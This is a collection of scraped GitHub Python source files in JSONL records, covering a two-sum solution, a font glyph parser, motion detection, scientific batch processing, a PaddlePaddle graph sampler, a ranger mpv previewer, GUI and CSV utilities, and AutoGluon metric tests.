+{"seq_id":"71811738317","text":"\"\"\"\n\nGiven an array of integers, return indices of the two numbers such that they add up to a specific target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nExample:\nGiven nums = [2, 7, 11, 15], target = 9,\n\nBecause nums[0] + nums[1] = 2 + 7 = 9,\nreturn [0, 1].\n\"\"\"\n\n\nclass Solution:\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n sort = sorted(nums)\n lesser = 0\n greater = len(sort) - 1\n while lesser < greater:\n number = sort[greater] + sort[lesser]\n if target == number:\n first = None\n for i, num in enumerate(nums):\n if num == sort[greater] or num == sort[lesser]:\n if first is None:\n first = i\n else:\n return [first, i]\n raise Exception\n elif target < number:\n greater -= 1\n else:\n lesser += 1\n\n raise Exception\n\n\ns = Solution()\nassert s.twoSum([2, 7, 11, 15], 9) == [0, 1]\n","repo_name":"jsmith/crackingthecodinginterview","sub_path":"leet/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40432153238","text":"#!/usr/bin/env python3\nimport sys\nfrom PIL import Image, ImageFont, ImageDraw\n\nGLYPHS = [\n 'ABCDEFGHIJKLMNOPQRTUVWXYZ',\n 'abcdefghijklmnopqrstuvwxyz',\n '0123456789',\n]\nGLYPH_HEIGHT = 16\nGLYPH_WIDTH = 8\nGLYPH_V_SPACING = 0\nGLYPH_H_SPACING = 0\n\n\ndef get_glyph_index(glyph: str) -> tuple[int, int] | None:\n if len(glyph) != 1:\n raise ValueError(glyph)\n\n for y in range(len(GLYPHS)):\n res = GLYPHS[y].find(glyph)\n if res > 0:\n return (res, y)\n\n return None\n\n\ndef get_glyph_box(glyph: str) -> tuple[int, int, int, int] | None:\n coords = get_glyph_index(glyph)\n if coords is None:\n return None\n x, y = coords\n x0 = GLYPH_H_SPACING + x * (GLYPH_WIDTH + GLYPH_H_SPACING)\n y0 = GLYPH_V_SPACING + y * (GLYPH_HEIGHT + GLYPH_V_SPACING)\n x1 = x0 + GLYPH_WIDTH\n y1 = y0 + GLYPH_HEIGHT\n\n return (x0, y0, x1, y1)\n\n\ndef get_glyphs_boxes() -> dict[str, tuple[int, int, int, int]]:\n res = {}\n for line in GLYPHS:\n for glyph in line:\n res[glyph] = get_glyph_box(glyph)\n\n return res\n\n\ndef get_glyph_pixels(img: Image.Image) -> dict[str, list[tuple[int, int]]]:\n glyph_boxes = get_glyphs_boxes()\n\n res = {}\n for glyph in glyph_boxes:\n glyph_img = img.crop(glyph_boxes[glyph])\n pixels = []\n for x in range(GLYPH_WIDTH):\n for y in range(GLYPH_HEIGHT):\n if glyph_img.getpixel((x, y)) > 0:\n pixels.append((x, y))\n\n res[glyph] = pixels\n\n return res\n\n\ndef render_font(path: str,\n width: int = 800,\n height: int = 600,\n font_size: int = 16) -> Image.Image:\n img = Image.new('1', (width, height))\n draw = ImageDraw.Draw(img)\n\n font = ImageFont.truetype(sys.argv[1], size=font_size)\n\n for y in range(len(GLYPHS)):\n for x in range(len(GLYPHS[y])):\n glyph = GLYPHS[y][x]\n glyph_x = GLYPH_H_SPACING + x * (GLYPH_WIDTH + GLYPH_H_SPACING)\n glyph_y = GLYPH_V_SPACING + y * (GLYPH_HEIGHT + GLYPH_V_SPACING)\n draw.text((glyph_x, glyph_y), glyph, font=font, fill=1)\n\n lines_len = [len(line) for line in GLYPHS]\n img_width = GLYPH_H_SPACING + max(lines_len) * (GLYPH_WIDTH +\n GLYPH_H_SPACING)\n img_height = GLYPH_V_SPACING + len(GLYPHS) * (GLYPH_HEIGHT +\n GLYPH_V_SPACING)\n return img.crop((0, 0, img_width, img_height))\n\n\nif __name__ == '__main__':\n img = render_font(sys.argv[1])\n\n print(get_glyph_pixels(img)['A'])\n img.save('font.png')\n","repo_name":"Stalis/esp-test-project","sub_path":"fonts/font_parser.py","file_name":"font_parser.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15809483026","text":"import cv2\nimport numpy as np\nimport os\nfrom time import time\nfrom detector import MotionDetector\nfrom packer import pack_images\nfrom numba import jit\n\n@jit(nopython=True)\ndef filter_fun(b):\n return ((b[2] - b[0]) * (b[3] - b[1])) > 300\n\nif __name__ == \"__main__\":\n\n\t\n\tdetector = MotionDetector(bg_history=1,\n bg_skip_frames=1,\n movement_frames_history=2,\n brightness_discard_level=30,\n bg_subs_scale_percent=0.2,\n pixel_compression_ratio=0.2,\n group_boxes=False,\n expansion_step=1)\n\n\tb_height = 320\n\tb_width = 320\n\t\n\tres = []\n\tavg_fps = []\n\tfc = dict()\n\tctr = 0\n\tpath = \"/home/darrylsf/Desktop/Motion_API/frames_college/\"\n\tdir_list = os.listdir(path)\n\tdir_list.sort()\n\t#print(dir_list)\n\t#print(path+dir_list[0])\n\tpath2 = path+dir_list[0]\n\t#frame = cv2.imread(path2)\n\t#cv2.imshow('Frame' , frame)\n\t\n\tfor i in dir_list:\n\t\tframe = cv2.imread('/home/darrylsf/Desktop/Motion_API/frames_college/'+i)\n\t\tframe2 = cv2.imread('/home/darrylsf/Desktop/Motion_API/frames_college/ezgif-frame-005.jpg')\n\t\t#cv2.imshow(\"5 FRAME\" , frame2)\n\t\tprint('/home/darrylsf/Desktop/Motion_API/frames_college/'+i)\n\t\tbegin = time()\n\n\t\tboxes, frame = detector.detect(frame)\n # boxes hold all boxes around motion parts\n\n ## this code cuts motion areas from initial image and\n ## fills \"bins\" of 320x320 with such motion areas.\n ##\n\t\tresults = []\n \n\t\tif boxes:\n\t\t\tresults, box_map = pack_images(frame=frame, boxes=boxes, width=b_width, height=b_height,\n box_filter=filter_fun)\n\t\t\ttext = \"Yes\"\n # box_map holds list of mapping between image placement in packed bins and original boxes\n\n ## end\n\t\tf = open(\"frame_counter.txt\", \"a\")\n\t\tfor b in boxes:\n\t\t\tcv2.rectangle(frame, (b[0], b[1]), (b[2], b[3]), (0, 0, 255), 2)\n\t\tif(len(boxes) > 0):\n\t\t\ttext = \"Yes\"\n\t\t\tf.write(\"1\\n\") \n\n\t\telse:\n\t\t\ttext = \"No\"\n\t\t\tf.write(\"0\\n\") \n\n\t\tf.close()\n\t\tend = time()\n \n\t\tit = (end - begin) * 1000\n\t\tit2 = (end - begin)\n\t\tfps = (1 / it2)\n\t\tprint(\"FPS: \"+str(fps))\n\t\tavg_fps.append(fps)\n\t\tif(len(avg_fps) == 0):\n\t\t\tcontinue\n\t\telse:\n\t\t\tavg = sum(avg_fps) / len(avg_fps)\n\t\tres.append(it)\n\t\tprint(\"StdDev: %.4f\" % np.std(res), \"Mean: %.4f\" % np.mean(res), \"Last: %.4f\" % it,\n \"Boxes found: \", len(boxes))\n\n\t\tcv2.putText(frame, \"Motion Detected: {}\".format(text), (10, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\n\t\tcv2.putText(frame, \"Average FPS: {}\".format(avg), (10, 80),\n cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\t\tif len(res) > 10000:\n\t\t\tres = []\n\n # idx = 0\n # for r in results:\n # idx += 1\n # cv2.imshow('packed_frame_%d' % idx, r)\n\n\t\tctr += 1\n\t\tnc = len(results)\n\t\tif nc in fc:\n\t\t\tfc[nc] += 1\n\t\telse:\n\t\t\tfc[nc] = 0\n\n\t\tif ctr % 100 == 0:\n\t\t\tprint(\"Total Frames: \", ctr, \"Packed Frames:\", fc)\n\n\t\tcv2.imshow('last_frame', frame)\n\t\tcv2.imshow('detect_frame', detector.detection_boxed)\n\t\tcv2.imshow('diff_frame', detector.color_movement)\n\t\tcv2.imwrite('/home/darrylsf/Desktop/Motion_API/result_frames/'+i , frame)\n\t\n\tcv2.waitKey(0) \n \n\t#closing all open windows \n\tcv2.destroyAllWindows() ","repo_name":"droid2299/motion-detection","sub_path":"motion_detector/image_motion.py","file_name":"image_motion.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71506714638","text":"#!/usr/bin/python\nimport os\nimport glob\nimport empyer\nimport argparse\n\n\n\n# This program is designed to take a diffraction signal, convert the signal to polar coordinates and then output\n# the angular correlation and power spectrum.\n\n\"\"\"\nOPTIONS:\n-d = cwd :directory\n\"\"\"\n\n\ndef correlation(signal_file):\n ds = empyer.load(signal_file, signal_type='diffraction_signal')\n ds.mask_below(300)\n file_name = os.path.splitext(signal_file)[0]\n ps = ds.calculate_polar_spectrum()\n ps.save(filename=file_name+'_polar.hdf5', overwrite=True)\n acs = ps.autocorrelation()\n acs.save(filename=file_name + '_angular.hdf5', overwrite=True)\n pow_s = acs.get_power_spectrum()\n pow_s.save(filename=file_name+'_angularPower.hdf5', overwrite=True)\n return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\",\n \"--directory\",\n type=str,\n help=\"input directory\")\n args = parser.parse_args()\n\n if not args.directory:\n args.directory = os.getcwd()\n if os.path.isdir(args.directory):\n files = glob.glob(args.directory+\"/*.hdf5\")\n else:\n files = [args.directory]\n print(files)\n\n for f in files:\n correlation(f)\n","repo_name":"CSSFrancis/empyer","sub_path":"CusterOperations/cluster_scripting.py","file_name":"cluster_scripting.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"36020534401","text":"from paddle import _legacy_C_ops\nfrom paddle.base.data_feeder import check_variable_and_dtype\nfrom paddle.base.layer_helper import LayerHelper\nfrom paddle.framework import in_dynamic_mode\n\n\ndef graph_khop_sampler(\n row,\n colptr,\n input_nodes,\n sample_sizes,\n sorted_eids=None,\n return_eids=False,\n name=None,\n):\n \"\"\"\n\n Graph Khop Sampler API.\n\n This API is mainly used in Graph Learning domain, and the main purpose is to\n provide high performance graph khop sampling method with subgraph reindex step.\n For example, we get the CSC(Compressed Sparse Column) format of the input graph\n edges as `row` and `colptr`, so as to covert graph data into a suitable format\n for sampling. And the `input_nodes` means the nodes we need to sample neighbors,\n and `sample_sizes` means the number of neighbors and number of layers we want\n to sample.\n\n Args:\n row (Tensor): One of the components of the CSC format of the input graph, and\n the shape should be [num_edges, 1] or [num_edges]. The available\n data type is int32, int64.\n colptr (Tensor): One of the components of the CSC format of the input graph,\n and the shape should be [num_nodes + 1, 1] or [num_nodes].\n The data type should be the same with `row`.\n input_nodes (Tensor): The input nodes we need to sample neighbors for, and the\n data type should be the same with `row`.\n sample_sizes (list|tuple): The number of neighbors and number of layers we want\n to sample. The data type should be int, and the shape\n should only have one dimension.\n sorted_eids (Tensor, optional): The sorted edge ids, should not be None when `return_eids`\n is True. The shape should be [num_edges, 1], and the data\n type should be the same with `row`. Default is None.\n return_eids (bool, optional): Whether to return the id of the sample edges. Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n - edge_src (Tensor), The src index of the output edges, also means the first column of\n the edges. The shape is [num_sample_edges, 1] currently.\n - edge_dst (Tensor), The dst index of the output edges, also means the second column\n of the edges. The shape is [num_sample_edges, 1] currently.\n - sample_index (Tensor), The original id of the input nodes and sampled neighbor nodes.\n - reindex_nodes (Tensor), The reindex id of the input nodes.\n - edge_eids (Tensor), Return the id of the sample edges if `return_eids` is True.\n\n Examples:\n .. code-block:: python\n\n >>> import paddle\n\n >>> row = [3, 7, 0, 9, 1, 4, 2, 9, 3, 9, 1, 9, 7]\n >>> colptr = [0, 2, 4, 5, 6, 7, 9, 11, 11, 13, 13]\n >>> nodes = [0, 8, 1, 2]\n >>> sample_sizes = [2, 2]\n >>> row = paddle.to_tensor(row, dtype=\"int64\")\n >>> colptr = paddle.to_tensor(colptr, dtype=\"int64\")\n >>> nodes = paddle.to_tensor(nodes, dtype=\"int64\")\n\n >>> edge_src, edge_dst, sample_index, reindex_nodes = paddle.incubate.graph_khop_sampler(row, colptr, nodes, sample_sizes, False)\n\n \"\"\"\n\n if in_dynamic_mode():\n if return_eids:\n if sorted_eids is None:\n raise ValueError(\n \"`sorted_eid` should not be None \" \"if return_eids is True.\"\n )\n (\n edge_src,\n edge_dst,\n sample_index,\n reindex_nodes,\n edge_eids,\n ) = _legacy_C_ops.graph_khop_sampler(\n row,\n sorted_eids,\n colptr,\n input_nodes,\n \"sample_sizes\",\n sample_sizes,\n \"return_eids\",\n True,\n )\n return edge_src, edge_dst, sample_index, reindex_nodes, edge_eids\n else:\n (\n edge_src,\n edge_dst,\n sample_index,\n reindex_nodes,\n _,\n ) = _legacy_C_ops.graph_khop_sampler(\n row,\n None,\n colptr,\n input_nodes,\n \"sample_sizes\",\n sample_sizes,\n \"return_eids\",\n False,\n )\n return edge_src, edge_dst, sample_index, reindex_nodes\n\n check_variable_and_dtype(\n row, \"Row\", (\"int32\", \"int64\"), \"graph_khop_sampler\"\n )\n\n if return_eids:\n if sorted_eids is None:\n raise ValueError(\n \"`sorted_eid` should not be None \" \"if return_eids is True.\"\n )\n check_variable_and_dtype(\n sorted_eids, \"Eids\", (\"int32\", \"int64\"), \"graph_khop_sampler\"\n )\n\n check_variable_and_dtype(\n colptr, \"Col_Ptr\", (\"int32\", \"int64\"), \"graph_khop_sampler\"\n )\n check_variable_and_dtype(\n input_nodes, \"X\", (\"int32\", \"int64\"), \"graph_khop_sampler\"\n )\n\n helper = LayerHelper(\"graph_khop_sampler\", **locals())\n edge_src = helper.create_variable_for_type_inference(dtype=row.dtype)\n edge_dst = helper.create_variable_for_type_inference(dtype=row.dtype)\n sample_index = helper.create_variable_for_type_inference(dtype=row.dtype)\n reindex_nodes = helper.create_variable_for_type_inference(dtype=row.dtype)\n edge_eids = helper.create_variable_for_type_inference(dtype=row.dtype)\n helper.append_op(\n type=\"graph_khop_sampler\",\n inputs={\n \"Row\": row,\n \"Eids\": sorted_eids,\n \"Col_Ptr\": colptr,\n \"X\": input_nodes,\n },\n outputs={\n \"Out_Src\": edge_src,\n \"Out_Dst\": edge_dst,\n \"Sample_Index\": sample_index,\n \"Reindex_X\": reindex_nodes,\n \"Out_Eids\": edge_eids,\n },\n attrs={\"sample_sizes\": sample_sizes, \"return_eids\": return_eids},\n )\n if return_eids:\n return edge_src, edge_dst, sample_index, reindex_nodes, edge_eids\n else:\n return edge_src, edge_dst, sample_index, reindex_nodes\n","repo_name":"PaddlePaddle/Paddle","sub_path":"python/paddle/incubate/operators/graph_khop_sampler.py","file_name":"graph_khop_sampler.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":21032,"dataset":"github-code","pt":"29"} +{"seq_id":"33240793318","text":"import os\nimport subprocess\nimport json\nimport atexit\nimport socket\nfrom pathlib import Path\n\nimport logging\nlogger = logging.getLogger(__name__)\nimport traceback\n\nfrom ranger.ext.img_display import ImageDisplayer, register_image_displayer\n\n@register_image_displayer(\"mpv\")\nclass MPVImageDisplayer(ImageDisplayer):\n \"\"\"Implementation of ImageDisplayer using mpv, a general media viewer.\n Opens media in a separate X window.\n\n mpv 0.25+ needs to be installed for this to work.\n \"\"\"\n\n def _send_command(self, path, sock):\n\n message = '{\"command\": [\"raw\",\"loadfile\",%s]}\\n' % json.dumps(path)\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n s.connect(str(sock))\n logger.info('-> ' + message)\n s.send(message.encode())\n message = s.recv(1024).decode()\n logger.info('<- ' + message)\n\n def _launch_mpv(self, path, sock):\n\n proc = subprocess.Popen([\n * os.environ.get(\"MPV\", \"mpv\").split(),\n \"--no-terminal\",\n \"--force-window\",\n \"--input-ipc-server=\" + str(sock),\n \"--image-display-duration=inf\",\n \"--loop-file=inf\",\n \"--no-osc\",\n \"--no-input-default-bindings\",\n \"--keep-open\",\n \"--idle\",\n \"--\",\n path,\n ])\n\n @atexit.register\n def cleanup():\n proc.terminate()\n sock.unlink()\n\n def draw(self, path, start_x, start_y, width, height):\n\n path = os.path.abspath(path)\n cache = Path(os.environ.get(\"XDG_CACHE_HOME\", \"~/.cache\")).expanduser()\n cache = cache / \"ranger\"\n cache.mkdir(exist_ok=True)\n sock = cache / \"mpv.sock\"\n\n try:\n self._send_command(path, sock)\n except (ConnectionRefusedError, FileNotFoundError):\n logger.info('LAUNCHING ' + path)\n self._launch_mpv(path, sock)\n except Exception as e:\n logger.exception(traceback.format_exc())\n sys.exit(1)\n logger.info('SUCCESS')\n","repo_name":"shiryel/fennecOS","sub_path":"modules/desktop-environment/common/ranger/config/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"29"} +{"seq_id":"70896055117","text":"from PyQt5.QtWidgets import QLabel\nfrom PyQt5.QtGui import QFont, QColor, QPainter, QPen\nfrom PyQt5.QtCore import Qt\n\nfrom ..colors import get_color\n\n\nclass Label(QLabel):\n\n def __init__(self, parent, text=None, is_bold=False):\n super().__init__(parent)\n\n font = QFont(\"Segoe UI\", 11)\n font.setBold(is_bold)\n\n self.setAutoFillBackground(True)\n\n self.refresh()\n\n self.setText(text)\n self.setFont(font)\n\n def refresh(self):\n pass\n\n def paintEvent(self, event):\n painter = QPainter(self)\n\n painter.setRenderHint(QPainter.HighQualityAntialiasing)\n painter.setPen(QPen(QColor(get_color(\"text\"))))\n\n painter.drawText(0, 0, self.width(), self.height(),\n Qt.AlignLeft, self.text())\n","repo_name":"TurtleP/BreadTools","sub_path":"BreadTools/gui/elements/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"27655134832","text":"import csv\n\ndef tsv_to_csv(input_file, output_file, encoding):\n with open(input_file, 'r', encoding=encoding) as tsvfile:\n reader = csv.reader(tsvfile, delimiter='\\t')\n with open(output_file, 'w', newline='', encoding=encoding) as csvfile:\n writer = csv.writer(csvfile)\n for row in reader:\n writer.writerow(row)\n\ninput_file = 'titles.csv'\noutput_file = 'output.csv'\ntsv_to_csv(input_file, output_file, 'utf-8')\n","repo_name":"strovertz/mysql-dashboard-terraform-grafana","sub_path":"automations/tsv_to_csv.py","file_name":"tsv_to_csv.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9102156414","text":"\n# This script was written by Trevor Hubbard; its purpose is two quickly calculate \n# this distance between some points in a network embedding\n\n# =========================\n# * SETUP *\n# =========================\n\nimport matplotlib.pyplot as plt\n\n# =========================\n# * CLASSES *\n# =========================\n\n\n# =========================\n# * METHODS *\n# =========================\n\n\n# =========================\n# * MAIN * \n# =========================\n\n# This creates the class from the node embeddings\nballPoints = []\nboomerangPoints = []\nembeddingPath = \"C:\\Data\\College\\CS 682 - Neural Networks\\Project\\Task 3 - Network Development\\Data\\industryGraph - 2 dim embedding.emd\"\nwith open(embeddingPath, \"r\", encoding=\"utf-8\") as embeddingFile:\n\n\tfor embeddingNum, embedding in enumerate(embeddingFile):\n\t\tif (embeddingNum == 0): continue #Skip the first line\n\t\tnodeID, xVal, yVal = [float(x) for x in embedding.split()]\n\t\tnodeID = int(nodeID)\n\t\tif (xVal < -2 and yVal < -1): \n\t\t\tballPoints.append((xVal, yVal))\n\t\telse:\n\t\t\tboomerangPoints.append((xVal, yVal))\n\nballPointsX = [x[0] for x in ballPoints]\nballPointsY = [x[1] for x in ballPoints]\nboomerangPointsX = [x[0] for x in boomerangPoints]\nboomerangPointsY = [x[1] for x in boomerangPoints]\nfig = plt.figure()\nax = fig.add_axes([0, 0, 1, 1])\nax.set_title(\"2-Dimensional Network Embedding of Music Industry Social Network\")\nax.scatter(ballPointsX, ballPointsY, color=\"green\")\nax.scatter(boomerangPointsX, boomerangPointsY, color=\"purple\")\nplt.show()","repo_name":"trevbook/Hit-Song-Predictor","sub_path":"Task 3 - Network Development/Scripts/visualization_node2vec2d.py","file_name":"visualization_node2vec2d.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6384769524","text":"from typing import List, Tuple\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom gluonts.dataset.split import split\nfrom gluonts.ev.metrics import (\n MAE,\n MAPE,\n MASE,\n MSE,\n ND,\n RMSE,\n SMAPE,\n AverageMeanScaledQuantileLoss,\n MeanWeightedSumQuantileLoss,\n)\nfrom gluonts.ev.metrics import Metric as GluonTSMetric\nfrom gluonts.model.evaluation import evaluate_forecasts\nfrom gluonts.model.forecast import QuantileForecast\n\nfrom autogluon.timeseries import TimeSeriesPredictor\nfrom autogluon.timeseries.metrics import AVAILABLE_METRICS, DEFAULT_METRIC_NAME, check_get_evaluation_metric\nfrom autogluon.timeseries.metrics.utils import _in_sample_abs_seasonal_error, _in_sample_squared_seasonal_error\nfrom autogluon.timeseries.models.gluonts.abstract_gluonts import AbstractGluonTSModel\n\nfrom .common import DUMMY_TS_DATAFRAME, get_data_frame_with_item_index\n\npytestmark = pytest.mark.filterwarnings(\"ignore\")\n\n\ndef get_ag_and_gts_metrics() -> List[Tuple[str, str, GluonTSMetric]]:\n # Each entry is a tuple (ag_metric_name, gts_metric_name, gts_metric_object)\n default_quantile_levels = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n # Metric that have different names in AutoGluon and GluonTS\n ag_and_gts_metrics = [\n (\"WQL\", \"mean_weighted_sum_quantile_loss\", MeanWeightedSumQuantileLoss(default_quantile_levels)),\n (\"SQL\", \"average_mean_scaled_quantile_loss\", AverageMeanScaledQuantileLoss(default_quantile_levels)),\n (\"WAPE\", \"ND[mean]\", ND(\"mean\")),\n ]\n # Metric that have same names in AutoGluon and GluonTS\n for point_metric_cls in [MAPE, SMAPE, MSE, RMSE, MASE, MAE]:\n name = str(point_metric_cls.__name__)\n ag_and_gts_metrics.append((name, f\"{name}[mean]\", point_metric_cls(\"mean\")))\n return ag_and_gts_metrics\n\n\nAG_AND_GTS_METRICS = get_ag_and_gts_metrics()\n\n\n@pytest.fixture(scope=\"module\")\ndef deepar_trained() -> AbstractGluonTSModel:\n pred = TimeSeriesPredictor(prediction_length=2, verbosity=4)\n pred.fit(\n DUMMY_TS_DATAFRAME,\n tuning_data=DUMMY_TS_DATAFRAME,\n hyperparameters={\n \"DeepAR\": dict(epochs=2),\n },\n )\n return pred._trainer.load_model(\"DeepAR\")\n\n\n@pytest.fixture(scope=\"module\")\ndef deepar_trained_zero_data() -> AbstractGluonTSModel:\n pred = TimeSeriesPredictor(prediction_length=2, verbosity=4)\n\n data = DUMMY_TS_DATAFRAME.copy() * 0\n\n pred.fit(\n data,\n tuning_data=data,\n hyperparameters={\n \"DeepAR\": dict(epochs=2),\n },\n )\n return pred._trainer.load_model(\"DeepAR\")\n\n\ndef to_gluonts_forecast(forecast_df, freq):\n forecast_list = []\n for item_id, fcast in forecast_df.groupby(level=\"item_id\", sort=False):\n start_date = fcast.index[0][1].to_period(freq=freq)\n qf = QuantileForecast(\n forecast_arrays=fcast.values.T,\n start_date=start_date,\n forecast_keys=fcast.columns,\n item_id=item_id,\n )\n forecast_list.append(qf)\n return forecast_list\n\n\ndef to_gluonts_test_set(data, prediction_length):\n ts_list = []\n for item_id, ts in data.groupby(level=\"item_id\", sort=False):\n entry = {\"target\": ts.loc[item_id][\"target\"], \"start\": pd.Period(ts.loc[item_id].index[0], freq=data.freq)}\n ts_list.append(entry)\n _, test_template = split(dataset=ts_list, offset=-prediction_length)\n return test_template.generate_instances(prediction_length, windows=1)\n\n\ndef check_gluonts_parity(\n ag_metric_name, gts_metric_name, gts_metric, data, model, zero_forecast=False, equal_nan=False\n):\n data_train, data_test = data.train_test_split(model.prediction_length)\n forecast_df = model.predict(data_train)\n forecast_df[\"mean\"] = forecast_df[\"0.5\"]\n if zero_forecast:\n forecast_df = forecast_df * 0\n seasonal_period = 3\n ag_metric = check_get_evaluation_metric(ag_metric_name)\n\n ag_value = ag_metric.sign * ag_metric(\n data_test,\n forecast_df,\n prediction_length=model.prediction_length,\n seasonal_period=seasonal_period,\n )\n\n gts_forecast = to_gluonts_forecast(forecast_df, freq=data_train.freq)\n gts_test_set = to_gluonts_test_set(data_test, model.prediction_length)\n gts_value = evaluate_forecasts(\n gts_forecast, test_data=gts_test_set, seasonality=seasonal_period, metrics=[gts_metric]\n ).values.item()\n assert np.isclose(gts_value, ag_value, atol=1e-5, equal_nan=equal_nan)\n\n\n@pytest.mark.parametrize(\"ag_metric_name, gts_metric_name, gts_metric\", AG_AND_GTS_METRICS)\ndef test_when_metric_evaluated_then_output_equal_to_gluonts(\n ag_metric_name, gts_metric_name, gts_metric, deepar_trained\n):\n check_gluonts_parity(\n ag_metric_name,\n gts_metric_name,\n gts_metric,\n data=DUMMY_TS_DATAFRAME,\n model=deepar_trained,\n )\n\n\n@pytest.mark.parametrize(\"ag_metric_name, gts_metric_name, gts_metric\", AG_AND_GTS_METRICS)\ndef test_given_all_zero_data_when_metric_evaluated_then_output_equal_to_gluonts(\n ag_metric_name, gts_metric_name, gts_metric, deepar_trained_zero_data\n):\n if ag_metric_name in [\"WQL\", \"WAPE\"]:\n pytest.skip(\n \"GluonTS produces incorrect values for these metrics on all-zero data https://github.com/awslabs/gluonts/issues/3034\"\n )\n\n check_gluonts_parity(\n ag_metric_name,\n gts_metric_name,\n gts_metric,\n data=DUMMY_TS_DATAFRAME.copy() * 0,\n model=deepar_trained_zero_data,\n equal_nan=True,\n )\n\n\n@pytest.mark.parametrize(\"ag_metric_name, gts_metric_name, gts_metric\", AG_AND_GTS_METRICS)\ndef test_given_zero_forecasts_when_metric_evaluated_then_output_equal_to_gluonts(\n ag_metric_name, gts_metric_name, gts_metric, deepar_trained\n):\n check_gluonts_parity(\n ag_metric_name,\n gts_metric_name,\n gts_metric,\n data=DUMMY_TS_DATAFRAME,\n model=deepar_trained,\n zero_forecast=True,\n )\n\n\ndef test_available_metrics_have_coefficients():\n for metric_cls in AVAILABLE_METRICS.values():\n metric = metric_cls()\n assert metric.sign in [-1, 1]\n\n\n@pytest.mark.parametrize(\n \"check_input, expected_output\",\n [(None, AVAILABLE_METRICS[DEFAULT_METRIC_NAME]())]\n + [(metric_name, metric_cls()) for metric_name, metric_cls in AVAILABLE_METRICS.items()]\n + [(metric_cls, metric_cls()) for metric_name, metric_cls in AVAILABLE_METRICS.items()]\n + [(metric_cls(), metric_cls()) for metric_name, metric_cls in AVAILABLE_METRICS.items()],\n)\ndef test_given_correct_input_check_get_eval_metric_output_correct(check_input, expected_output):\n assert expected_output.name == check_get_evaluation_metric(check_input).name\n\n\ndef test_given_unavailable_input_and_raise_check_get_eval_metric_raises():\n with pytest.raises(ValueError):\n check_get_evaluation_metric(\"some_nonsense_eval_metric\")\n\n\n@pytest.mark.parametrize(\"eval_metric\", [\"MASE\", \"RMSSE\", \"SQL\"])\ndef test_given_historic_data_not_cached_when_scoring_then_exception_is_raised(eval_metric):\n prediction_length = 3\n evaluator = check_get_evaluation_metric(eval_metric)\n data_future = DUMMY_TS_DATAFRAME.slice_by_timestep(-prediction_length, None)\n predictions = data_future.rename({\"target\": \"mean\"}, axis=1)\n with pytest.raises(AssertionError, match=\"Call `save_past_metrics` before\"):\n evaluator.compute_metric(data_future=data_future, predictions=predictions)\n\n\ndef test_when_eval_metric_seasonal_period_is_longer_than_ts_then_abs_seasonal_error_is_set_to_1():\n seasonal_period = max(DUMMY_TS_DATAFRAME.num_timesteps_per_item())\n naive_error_per_item = _in_sample_abs_seasonal_error(\n y_past=DUMMY_TS_DATAFRAME[\"target\"], seasonal_period=seasonal_period\n )\n assert (naive_error_per_item == 1.0).all()\n\n\ndef test_when_eval_metric_seasonal_period_is_longer_than_ts_then_squared_seasonal_error_is_set_to_1():\n seasonal_period = max(DUMMY_TS_DATAFRAME.num_timesteps_per_item())\n naive_error_per_item = _in_sample_squared_seasonal_error(\n y_past=DUMMY_TS_DATAFRAME[\"target\"], seasonal_period=seasonal_period\n )\n assert (naive_error_per_item == 1.0).all()\n\n\n@pytest.mark.parametrize(\"prediction_length, seasonal_period, expected_result\", [(3, 1, 3), (6, 3, 2)])\ndef test_RMSSE(prediction_length, seasonal_period, expected_result):\n data = get_data_frame_with_item_index(\n [\"1\"],\n start_date=\"2022-01-01 00:00:00\",\n data_length=2 * prediction_length,\n columns=[\"target\"],\n data_generation=\"sequential\",\n )\n predictions = get_data_frame_with_item_index(\n [\"1\"],\n start_date=str(pd.Timestamp(\"2022-01-01 00:00:00\") + pd.to_timedelta(prediction_length, unit=\"H\")),\n data_length=prediction_length,\n columns=[\"mean\"],\n data_generation=\"sequential\",\n )\n metric = check_get_evaluation_metric(\"RMSSE\")\n ag_value = metric.sign * metric(\n data, predictions, prediction_length=prediction_length, seasonal_period=seasonal_period\n )\n assert ag_value == expected_result\n\n\n@pytest.mark.parametrize(\"metric_name\", AVAILABLE_METRICS)\ndef test_given_metric_is_optimized_by_median_when_model_predicts_then_median_is_pasted_to_mean_forecast(metric_name):\n eval_metric = check_get_evaluation_metric(metric_name)\n pred = TimeSeriesPredictor(prediction_length=5, eval_metric=eval_metric)\n pred.fit(DUMMY_TS_DATAFRAME, hyperparameters={\"DeepAR\": {\"epochs\": 1, \"num_batches_per_epoch\": 1}})\n predictions = pred.predict(DUMMY_TS_DATAFRAME)\n if eval_metric.optimized_by_median:\n assert (predictions[\"mean\"] == predictions[\"0.5\"]).all()\n 